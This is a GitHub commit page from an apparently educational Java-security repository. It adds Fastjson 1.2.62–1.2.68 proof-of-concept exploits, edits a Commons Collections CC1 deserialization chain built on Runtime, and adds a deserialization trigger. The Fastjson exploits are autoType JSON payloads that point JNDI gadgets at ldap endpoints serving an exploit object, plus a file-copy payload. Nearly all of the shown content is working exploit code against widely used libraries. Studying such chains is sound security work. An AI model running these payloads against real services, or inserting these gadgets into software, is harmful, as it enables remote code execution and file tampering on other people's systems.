Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Appearance settings

Commit 26b2a0d

Browse filesBrowse files
Drun1babyDrun1baby
committed
🆕修改部分项目代码,以及更新学习路线
1 parent d61cef6 commit 26b2a0d
Copy full SHA for 26b2a0d

File tree

Expand file treeCollapse file tree

119 files changed

+1102
-88
lines changed
Open diff view settings
Filter options

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.
Dismiss banner
Expand file treeCollapse file tree

119 files changed

+1102
-88
lines changed
Open diff view settings
Collapse file

‎JavaSecurity/CC/CC1/ser.bin‎

Copy file name to clipboard
-1.24 KB
Binary file not shown.
Collapse file

‎JavaSecurity/CC/CC1/src/EXP/FinalTransformMapEXP/TransformMapEXP.java‎

Copy file name to clipboardExpand all lines: JavaSecurity/CC/CC1/src/EXP/FinalTransformMapEXP/TransformMapEXP.java
+2-1Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -16,6 +16,7 @@
1616
public class TransformMapEXP {
1717
public static void main(String[] args) throws Exception{
1818
Transformer[] transformers = new Transformer[]{
19+
new ConstantTransformer(Runtime.class),
1920
new ConstantTransformer(Runtime.class), // 构造 setValue 的可控参数
2021
new InvokerTransformer("getMethod",
2122
new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
@@ -34,7 +35,7 @@ public static void main(String[] args) throws Exception{
3435

3536
// 序列化反序列化
3637
serialize(o);
37-
unserialize("ser.bin");
38+
//unserialize("ser.bin");
3839
}
3940
public static void serialize(Object obj) throws IOException {
4041
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
Collapse file

‎JavaSecurity/CC/CC1/src/EXP/Test.java‎

Copy file name to clipboard
+17Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
import java.io.FileInputStream;
2+
import java.io.IOException;
3+
import java.io.ObjectInputStream;
4+
import java.io.Serializable;
5+
6+
public class Test implements Serializable {
7+
public static void main(String[] args) throws IOException, ClassNotFoundException {
8+
unserialize("ser.bin");
9+
}
10+
11+
public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
12+
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
13+
Object obj = ois.readObject();
14+
15+
return obj;
16+
}
17+
}
Collapse file

‎JavaSecurity/CC/CC1/target/classes/FinalTransformMapEXP/TransformMapEXP.class‎

Copy file name to clipboard
-8 Bytes
Binary file not shown.
Collapse file

‎JavaSecurity/CC/CC1/target/classes/Test.class‎

Copy file name to clipboard
4.47 KB
Binary file not shown.
Collapse file

‎JavaSecurity/Fastjson/FastjsonEXP_1.2.62-1.2.68/pom.xml‎

Copy file name to clipboard
+43Lines changed: 43 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,43 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<project xmlns="http://maven.apache.org/POM/4.0.0"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
5+
<modelVersion>4.0.0</modelVersion>
6+
7+
<groupId>org.example</groupId>
8+
<artifactId>FastjsonEXP_1.2.62-1.2.68</artifactId>
9+
<version>1.0-SNAPSHOT</version>
10+
<dependencies>
11+
<dependency>
12+
<groupId>com.alibaba</groupId>
13+
<artifactId>fastjson</artifactId>
14+
<version>1.2.68</version>
15+
</dependency>
16+
<dependency>
17+
<groupId>com.esotericsoftware</groupId>
18+
<artifactId>kryo</artifactId>
19+
<version>4.0.0</version>
20+
</dependency>
21+
<dependency>
22+
<groupId>org.aspectj</groupId>
23+
<artifactId>aspectjtools</artifactId>
24+
<version>1.9.5</version>
25+
</dependency>
26+
<dependency>
27+
<groupId>org.apache.xbean</groupId>
28+
<artifactId>xbean-reflect</artifactId>
29+
<version>4.18</version>
30+
</dependency>
31+
<dependency>
32+
<groupId>commons-collections</groupId>
33+
<artifactId>commons-collections</artifactId>
34+
<version>3.2.1</version>
35+
</dependency>
36+
37+
</dependencies>
38+
<properties>
39+
<maven.compiler.source>8</maven.compiler.source>
40+
<maven.compiler.target>8</maven.compiler.target>
41+
</properties>
42+
43+
</project>
Collapse file

‎JavaSecurity/Fastjson/FastjsonEXP_1.2.62-1.2.68/src/main/java/CopyAttack_1268.java‎

Copy file name to clipboard
+10Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
import com.alibaba.fastjson.JSON;
2+
3+
// Fastjson 1.2.68 产生的任意文件读取攻击
4+
public class CopyAttack_1268 {
5+
public static void main(String[] args) {
6+
String poc = "{\"@type\":\"java.lang.AutoCloseable\", \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\", " +
7+
"\"tempPath\":\"C:/Windows/win.ini\", \"targetPath\":\"E:/flag.txt\"}";
8+
JSON.parse(poc);
9+
}
10+
}
Collapse file

‎JavaSecurity/Fastjson/FastjsonEXP_1.2.62-1.2.68/src/main/java/EXP_1262.java‎

Copy file name to clipboard
+12Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
import com.alibaba.fastjson.JSON;
2+
import com.alibaba.fastjson.parser.ParserConfig;
3+
import org.apache.xbean.propertyeditor.JndiConverter;
4+
5+
public class EXP_1262 {
6+
public static void main(String[] args) {
7+
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
8+
String poc = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\"," +
9+
"\"AsText\":\"ldap://127.0.0.1:1234/ExportObject\"}";
10+
JSON.parse(poc);
11+
}
12+
}
Collapse file

‎JavaSecurity/Fastjson/FastjsonEXP_1.2.62-1.2.68/src/main/java/EXP_1266.java‎

Copy file name to clipboard
+14Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
import com.alibaba.fastjson.JSON;
2+
import com.alibaba.fastjson.parser.ParserConfig;
3+
4+
public class EXP_1266 {
5+
public static void main(String[] args) {
6+
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
7+
String poc = "{\"@type\":\"org.apache.shiro.realm.jndi.JndiRealmFactory\", \"jndiNames\":[\"ldap://localhost:1234/ExportObject\"], \"Realms\":[\"\"]}";
8+
// String poc = "{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\":\"ldap://localhost:1389/Exploit\"}";
9+
// String poc = "{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"ldap://localhost:1389/Exploit\"}";
10+
// String poc = "{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\"," +
11+
// "\"properties\": {\"@type\":\"java.util.Properties\",\"UserTransaction\":\"ldap://localhost:1389/Exploit\"}}";
12+
JSON.parse(poc);
13+
}
14+
}
Collapse file

‎JavaSecurity/Fastjson/FastjsonEXP_1.2.62-1.2.68/src/main/java/EXP_1267.java‎

Copy file name to clipboard
+12Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
import com.alibaba.fastjson.JSON;
2+
import com.alibaba.fastjson.parser.ParserConfig;
3+
import com.sun.xml.internal.ws.api.ha.StickyFeature;
4+
5+
public class EXP_1267 {
6+
public static void main(String[] args) {
7+
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
8+
String poc = "{\"@type\":\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\"," +
9+
" \"jndiNames\":[\"ldap://localhost:1234/ExportObject\"], \"tm\": {\"$ref\":\"$.tm\"}}";
10+
JSON.parse(poc);
11+
}
12+
}

0 commit comments

Comments
0 (0)
Morty Proxy This is a proxified and sanitized view of the page, visit original site.